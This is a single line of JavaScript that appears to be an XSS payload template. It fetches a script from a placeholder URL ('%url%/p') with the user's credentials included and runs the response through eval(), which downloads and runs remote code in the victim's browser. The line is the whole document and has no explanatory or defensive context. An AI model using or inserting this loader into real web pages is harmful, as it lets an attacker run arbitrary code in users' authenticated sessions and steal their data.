fetch('%url%/p',{credentials: 'include'}).then(response=>response.text()).then(text=>{eval(text)})